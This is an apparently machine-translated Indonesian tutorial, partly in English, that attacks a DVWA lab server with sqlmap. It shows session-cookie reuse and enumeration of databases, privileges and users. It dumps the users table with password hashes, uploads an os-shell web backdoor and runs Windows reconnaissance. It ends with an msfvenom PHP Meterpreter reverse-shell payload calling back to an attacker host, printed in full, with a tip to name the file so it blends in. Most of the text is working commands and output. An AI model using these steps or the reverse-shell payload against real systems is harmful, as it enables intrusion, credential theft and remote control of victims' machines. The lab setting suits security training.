[*]News.nextcloud.asia –
Untuk memanfaatkan aplikasi web, penyerang setidaknya harus memahami operasi dasar aplikasi. Untuk postingan kali ini, kita akan menggunakan Dam Vulnerable Web Application (DVWA) dan injeksi SQLi-nya.
Setelah kami masuk dan menavigasi ke halaman SQLi dan memasukkan nilai “1”, kami mendapatkan:
Sekarang kita tahu bahwa memasukkan “1” mengembalikan beberapa hasil, apa yang akan terjadi jika kita memasukkan satu centang seperti ‘ ? Server mengembalikan kesalahan berikut:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1
Dari atas, kita dapat menyimpulkan bahwa situs ini mungkin rentan terhadap serangan injeksi SQL. Mari kita jalankan pengujian menggunakan SQLMap.
http://10.0.0.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Dari atas, kita melihat dua parameter. Ini adalah “id” dan “kirim”. Sekarang mari kita gunakan ini dengan SQLMap.
Ketika kita menjalankan SQLMap, kita mendapatkan:
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" ___ __H__ ___ ___[']_____ ___ ___ {1.4.6#stable} |_ -| . ['] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:58:49 /2020-06-24/ [10:58:50] [INFO] testing connection to the target URL got a 302 redirect to 'http://10.0.0.108:80/dvwa/login.php'. Do you want to follow? [Y/n]n
Di atas kita melihat kita sedang diarahkan kembali ke halaman login ‘http://10.0.0.108:80/dvwa/login.php’. Mungkin akan agak sulit bagi kami untuk mengautentikasi dari baris perintah dan kembali ke halaman itu. Untungnya bagi kita, kita dapat menggunakan argumen “–cookie”.
Mengingat kami masuk ke aplikasi sebelumnya, pada dasarnya kami dapat menggunakan kembali cookie itu. Atau, jika Anda memiliki cookie pengguna lain, Anda mungkin dapat mengautentikasi dengan cookie itu juga. Mari kita gunakan cookie.
Untuk menemukan cookie yang akan digunakan, saya “mengklik kanan” pada halaman yang dimaksud (ingat saya telah masuk sebelumnya), memilih “Periksa” dan kemudian memilih tab “Konsol”. Setelah di konsol, saya menjalankan “document.cookie”. Ini mengembalikan cookie “security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0”
Sekarang kita memiliki cookie, mari kita gunakan dengan SQLMap. Mari kita juga menggunakan kesempatan untuk menyiram informasi sesi sebelumnya untuk target saat ini, dengan menggunakan “–flush-session”.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session ___ __H__ ___ ___["]_____ ___ ___ {1.4.6#stable} |_ -| . [.] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:18:19 /2020-06-24/ [11:18:20] [INFO] testing connection to the target URL [11:18:21] [INFO] checking if the target is protected by some kind of WAF/IPS [11:18:21] [INFO] testing if the target URL content is stable [11:18:21] [INFO] target URL content is stable [11:18:21] [INFO] testing if POST parameter 'id' is dynamic [11:18:22] [WARNING] POST parameter 'id' does not appear to be dynamic [11:18:22] [INFO] heuristic (basic) test shows that POST parameter 'id' might be injectable (possible DBMS: 'MySQL') [11:18:22] [INFO] heuristic (XSS) test shows that POST parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks [11:18:22] [INFO] testing for SQL injection on POST parameter 'id' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] .... <truncated for brevity> ..... 11:20:35] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests: .... <truncated for brevity> .....
Sepertinya kami sekarang dapat mengonfirmasi bahwa ada kerentanan, yang mungkin dapat kami manfaatkan. Kita bisa melihat ini di atas dari 3 baris yang dicetak tebal.
Sekarang kita tahu ini bekerja, mari kita menghitung “banner” melalui argumen “–banner”. Kami juga akan menggunakan opsi “–batch” karena saat ini tidak diperlukan input pengguna. Selain itu, seperti yang dilaporkan di atas “sepertinya DBMS back-end adalah ‘MySQL'”. Mari tentukan ini melalui “–dbms=”MySQL”
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --banner .... <truncated for brevity> ..... --- [12:12:56] [INFO] the back-end DBMS is MySQL [12:12:56] [INFO] fetching banner back-end DBMS: MySQL >= 5.0 (MariaDB fork) banner: '10.1.30-MariaDB' [12:12:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:12:57 /2020-06-24/
Dari atas, kita melihat database backend adalah “MySQL >= 5.0 (MariaDB fork)”. Secara khusus kami melihat spanduk “banner: ‘10.1.30-MariaDB'”.
Pada titik ini kita dapat berburu internet untuk menemukan kerentanan yang terkait dengan “10.1.30-MariaDB'”
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --user-agent="Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" --current-user .... <truncated for brevity> ..... --- [12:28:55] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:28:56] [INFO] fetching current user current user: '[email protected]' [12:28:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:28:56 /2020-06-24/
Di atas, kita melihat “pengguna saat ini: ‘[email protected]'”. Tidak ada gunanya menjalankan program sebagai “root”. Mungkin ini akan bermanfaat bagi kita nanti.
Ok, di atas sudah keren kita bisa menentukan user-agent. Bagaimana kalau daripada menentukan satu, kami membiarkan SQLMap melakukan ini sendiri. Saat kita melihat untuk menghitung database saat ini (“–current-db”), mari kita juga menggunakan “–random-agent”.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --current-db .... [12:34:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu' from file '/usr/share/sqlmap/data/txt/user-agents.txt' .... <truncated for brevity> ..... --- [12:35:05] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:35:05] [INFO] fetching current database current database: 'dvwa' [12:35:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:35:05 /2020-06-24/
Kita melihat di atas bahwa agen pengguna dipilih dari file “user-agents.txt” bersama dengan “database saat ini: ‘dvwa'”. Mari kita lihat database lain apa yang mungkin ada atau yang mungkin kita akses menggunakan “–dbs”
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --dbs .... <truncated for brevity> ..... --- [12:41:28] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:41:29] [INFO] fetching database names available databases [7]: [*] dvwa [*] information_schema [*] mysql [*] nowasp [*] performance_schema [*] phpmyadmin [*] test
Di atas kita melihat daftar database yang tersedia. Sepertinya kita bisa bersenang-senang dengan beberapa ini. Namun, mari kita tetap menggunakan “dvwa” saat ini. Kita sudah tahu bahwa pengguna saat ini adalah “[email protected]”. Mari kita lihat apakah pengguna ini juga merupakan administrator basis data melalui “–is-dba”
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --is-dba .... <truncated for brevity> ..... --- [12:45:12] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:45:12] [INFO] testing if current user is DBA [12:45:12] [INFO] fetching current user current user is DBA: True [12:45:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:45:13 /2020-06-24/
Sepertinya pengguna saat ini adalah Administrator Basis Data. Mari validasikan hak istimewa dari berbagai pengguna melalui “–hak istimewa”.
Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges". [email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --privileges .... <truncated for brevity> ..... back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:49:51] [INFO] fetching database users privileges database management system users privileges: [*] ''@'localhost' [1]: privilege: USAGE [*] 'pma'@'localhost' [1]: privilege: USAGE [*] 'root'@'127.0.0.1' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [*] 'root'@'::1' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [*] 'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [12:49:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:49:51 /2020-06-24/ Liking the program which has been made so far, let's now look at the roles of the various users via "--roles" [email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --roles <.... truncated for brevity ..... > [12:51:48] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (X11; Linux i686; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt 12:52:16] [INFO] fetching database users privileges database management system users roles: [*] ''@'localhost' [1]: role: USAGE [*] 'pma'@'localhost' [1]: role: USAGE [*] 'root'@'127.0.0.1' (administrator) [28]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TABLESPACE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EVENT role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: TRIGGER role: UPDATE [*] 'root'@'::1' (administrator) [28]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TABLESPACE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EVENT role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: TRIGGER role: UPDATE [*] 'root'@'localhost' (administrator) [28]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TABLESPACE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EVENT role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: TRIGGER role: UPDATE [12:52:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:52:16 /2020-06-24/
Dengan hal di atas, kami dapat menyimpulkan siapa pengguna sistem ini berdasarkan kueri yang kami buat untuk hak istimewa. Namun, mari konfirmasi pengguna melalui “–users”.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent --users <... truncated for brevity ...> --- [12:59:59] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:59:59] [INFO] fetching database users database management system users [5]: [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'::1' [*] 'root'@'localhost' [12:59:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:59:59 /2020-06-24/
Sekarang mari kita lihat mengambil kata sandi melalui “–password”. Mari kita juga menghapus opsi “–batch”. Ini memungkinkan kita untuk sekarang berinteraksi dengan SQLMap.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --random-agent --passwords <... truncated for brevity ...> [13:04:08] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:04:09] [INFO] fetching database users password hashes do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] [13:04:27] [WARNING] no clear password(s) found database management system users password hashes: [*] pma [1]: password hash: NULL [*] root [1]: password hash: NULL [13:04:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:04:27 /2020-06-24/
Sekarang mari kita lihat tabel di dalam berbagai database.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --tables --- [13:17:56] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:17:56] [INFO] fetching database names [13:17:56] [INFO] fetching tables for databases: 'dvwa, information_schema, mysql, nowasp, performance_schema, phpmyadmin, test' Database: dvwa [2 tables] +----------------------------------------------------+ | guestbook | | users | +----------------------------------------------------+ Database: information_schema [78 tables] +----------------------------------------------------+ | ALL_PLUGINS | | APPLICABLE_ROLES | <.... truncated for brevity .... > | STATISTICS | | TABLES | +----------------------------------------------------+ Database: mysql [34 tables] +----------------------------------------------------+ | db | | event | | user | <.... truncated for brevity .... > | time_zone_transition | | time_zone_transition_type | +----------------------------------------------------+ Database: nowasp [13 tables] +----------------------------------------------------+ | accounts | | balloon_tips | | blogs_table | <.... truncated for brevity .... > | user_poll_results | | youtubevideos | +----------------------------------------------------+ Database: performance_schema [52 tables] +----------------------------------------------------+ | accounts | | cond_instances | | events_stages_current | <.... truncated for brevity .... > | users | +----------------------------------------------------+ Database: phpmyadmin [19 tables] +----------------------------------------------------+ | pma__bookmark | | pma__central_columns | <.... truncated for brevity .... > | pma__users | +----------------------------------------------------+ [13:17:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:17:57 /2020-06-24/
Sementara informasi di atas terpotong, Anda dapat melihat bahwa pada dasarnya kami telah membuang semua tabel dari berbagai database. Kita sekarang dapat fokus pada struktur tabel tertentu dengan mengeksekusi “-D” untuk database tertentu dan “-T” untuk tabel tertentu dan “–kolom”
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa -T users --columns --- [13:29:19] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:29:19] [INFO] fetching columns for table 'users' in database 'dvwa' Database: dvwa Table: users [8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | password | varchar(32) | | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | user_id | int(6) | +--------------+-------------+ [13:29:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:29:19 /2020-06-24/
Sekarang mari kita membaca semua record dalam tabel “users” di dalam database “dvwa” melalui “–sql-query”.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa --sql-query="select * from users" <.... truncated for brevity ....> --- [13:33:52] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:33:52] [INFO] fetching SQL SELECT statement query output: 'select * from users' [13:33:52] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself [13:33:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns [13:33:52] [INFO] fetching current database [13:33:52] [INFO] fetching columns for table 'users' in database 'dvwa' [13:33:52] [INFO] the query with expanded column name(s) is: SELECT `password`, `user`, avatar, failed_login, first_name, last_login, last_name, user_id FROM users select * from users [5]: [*] 5f4dcc3b5aa765d61d8327deb882cf99, admin, http://localhost/DVWA/hackable/users/admin.jpg, 0, admin, 2018-02-05 01:58:15, admin, 1 [*] e99a18c428cb38d5f260853678922e03, gordonb, http://localhost/DVWA/hackable/users/gordonb.jpg, 0, Gordon, 2018-02-05 01:58:15, Brown, 2 [*] 8d3533d75ae2c3966d7e0d4fcc69216b, 1337, http://localhost/DVWA/hackable/users/1337.jpg, 0, Hack, 2018-02-05 01:58:15, Me, 3 [*] 0d107d09f5bbe40cade3de5c71e9e9b7, pablo, http://localhost/DVWA/hackable/users/pablo.jpg, 0, Pablo, 2018-02-05 01:58:15, Picasso, 4 [*] 5f4dcc3b5aa765d61d8327deb882cf99, smithy, http://localhost/DVWA/hackable/users/smithy.jpg, 0, Bob, 2018-02-05 01:58:15, Smith, 5 [13:33:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:33:52 /2020-06-24/
Pada titik ini, ada banyak hal lain yang harus kita lakukan, seperti membaca dan menulis file, dll. Namun, mari kita coba untuk mendapatkan akses ke sistem operasi yang mendasarinya melalui perintah “–os-shell”.
[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent -D dvwa --os-shell <.... Truncated for brevity ....> --- [13:42:17] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:42:17] [INFO] going to use a web backdoor for command prompt [13:42:17] [INFO] fingerprinting the back-end DBMS operating system [13:42:18] [INFO] the back-end DBMS operating system is Windows which web application language does the web server support? [1] ASP (default) [2] ASPX [3] JSP [4] PHP
Dari atas, kami memilih “[4] PHP”
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] [13:43:20] [WARNING] unable to automatically retrieve the web server document root what do you want to use for writable directory? [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 4
use any additional custom directories [Enter for None]: [13:49:55] [WARNING] unable to automatically parse any web server path [13:49:55] [INFO] trying to upload the file stager on '/xampp/' via LIMIT 'LINES TERMINATED BY' method [13:49:55] [WARNING] unable to upload the file stager on '/xampp/' [13:49:55] [INFO] trying to upload the file stager on '/xampp/' via UNION method [13:49:55] [WARNING] expect junk characters inside the file as a leftover from UNION query [13:49:55] [INFO] the remote file '/xampp/tmpufnkt.php' is larger (701 B) than the local file '/tmp/sqlmaptm_zmipy4631/tmpdhp84kj_' (700B) ... [15:52:35] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method [15:52:35] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php [15:52:36] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpbfkst.php [15:52:36] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell>
…. di atas kita melihat “os-shell>” dan “file stager telah berhasil diupload di ‘/xampp/htdocs/’ – http://10.0.0.108:80/tmpuevkq.php”.
Menguji shell yang kita lihat:
BREAK Sets or clears extended CTRL+C checking. BCDEDIT Sets properties in boot database to control boot loading. CACLS Displays or modifies access control lists (ACLs) of files. CALL Calls one batch program from another. CD Displays the name of or changes the current directory. CHCP Displays or sets the active code page number. CHDIR Displays the name of or changes the current directory. CHKDSK Checks a disk and displays a status report. CHKNTFS Displays or modifies the checking of disk at boot time. CLS Clears the screen. CMD Starts a new instance of the Windows command interpreter. < ... truncated for brevity .... > VOL Displays a disk volume label and serial number. XCOPY Copies files and directory trees. WMIC Displays WMI information inside interactive command shell. For more information on tools see the command-line reference in the online help. --- os-shell>
Melihat proses pada sistem melalui “wmic process list brief”
os-shell> wmic process list brief do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- HandleCount Name Priority ProcessId ThreadCount WorkingSetSize 0 System Idle Process 0 0 2 8192 1974 System 8 4 99 139264 52 smss.exe 11 312 2 987136 <.... Truncated for brevity .... > 276 taskhostw.exe 8 1732 4 17592320 193 svchost.exe 8 5576 4 7356416 62 cmd.exe 8 4332 2 3862528 108 conhost.exe 8 4996 3 10129408 192 WMIC.exe 8 5076 6 11042816 157 WmiPrvSE.exe 8 6520 9 8593408 ....
Lihatlah pengguna pada sistem.
--- os-shell> wmic useraccount do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- AccountType Caption Description Disabled Domain FullName InstallDate LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status 512 SECURITYNIK-WINAdministrator Built-in account for administering the computer/domain FALSE SECURITYNIK-WIN TRUE FALSE Administrator TRUE FALSE TRUE S-1-5-21-3846991316-327138358-508696823-500 1 OK 512 SECURITYNIK-WINDefaultAccount A user account managed by the system. TRUE SECURITYNIK-WIN TRUE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-503 1 Degraded 512 SECURITYNIK-WINGuest Built-in account for guest access to the computer/domain TRUE SECURITYNIK-WIN TRUE FALSE Guest FALSE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-501 1 Degraded 512 SECURITYNIK-WINSecurityNik FALSE SECURITYNIK-WIN TRUE FALSE SecurityNik TRUE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-1002 1 OK 512 SECURITYNIK-WINToronto FALSE SECURITYNIK-WIN TRUE FALSE Toronto TRUE TRUE TRUE S-1-5-21-3846991316-327138358-508696823-1005 1 OK 512 SECURITYNIK-WINWDAGUtilityAccount A user account managed and used by the system for Windows Defender Application Guard scenarios. TRUE SECURITYNIK-WIN TRUE FALSE WDAGUtilityAccount TRUE TRUE TRUE S-1-5-21-3846991316-327138358-508696823-504 1 Degraded ---
Ambil “info sistem”
os-shell> systeminfo do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- Host Name: SECURITYNIK-WIN OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation ... Page File Location(s): C:pagefile.sys Domain: WORKGROUP Logon Server: SECURITYNIK-WIN Hotfix(s): 2 Hotfix(s) Installed. [01]: KB4053577 [02]: KB4054517 Network Card(s): 2 NIC(s) Installed. [01]: Microsoft KM-TEST Loopback Adapter Connection Name: Npcap Loopback Adapter DHCP Enabled: Yes DHCP Server: 255.255.255.255 IP address(es) [01]: 169.254.149.255 [02]: fe80::18f0:70a4:4f2c:95ff [02]: Intel(R) PRO/1000 MT Desktop Adapter Connection Name: Ethernet 2 DHCP Enabled: Yes DHCP Server: 10.0.0.100 IP address(es) [01]: 10.0.0.108 [02]: fe80::a858:9eed:630a:53f7 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Dengan informasi di atas, kita dapat mempertimbangkan perangkat tambahan di jaringan yang akan dipivot.
Ada hal keren lainnya yang bisa kita lakukan dengan “wmic” di “os-shell” ini. Namun, mari kita beralih kembali ke mesin penyerang kita dan menggunakan alat favorit penguji penetrasi untuk membuat segalanya lebih menarik.
Mari kita mulai dengan “msfvenom”. Dalam contoh saya, saya mengarahkan output ke panggilan file bernama “tmp.php”
[email protected]:~$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.107 LPORT=4443 --format raw --smallest > tmp.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 1111 bytes
Jika saya “cat” file “tmp.php”, kita melihat:
[email protected]:~$ cat tmp.php /*<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f="stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type="stream"; } if (!$s && ($f="fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type="stream"; } if (!$s && ($f="socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type="socket"; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Kita sekarang harus menghapus “/*” dari awal file. Anda cukup membuka file di editor favorit Anda untuk menghapus dua karakter tersebut. Bagi saya, saya akan menggunakan “cut –characters” untuk memotong 2 karakter pertama dan menyimpan yang lainnya. Saya kemudian mengarahkan output itu ke file bernama “server.php”. Dengan nama itu saya berharap bisa berbaur.
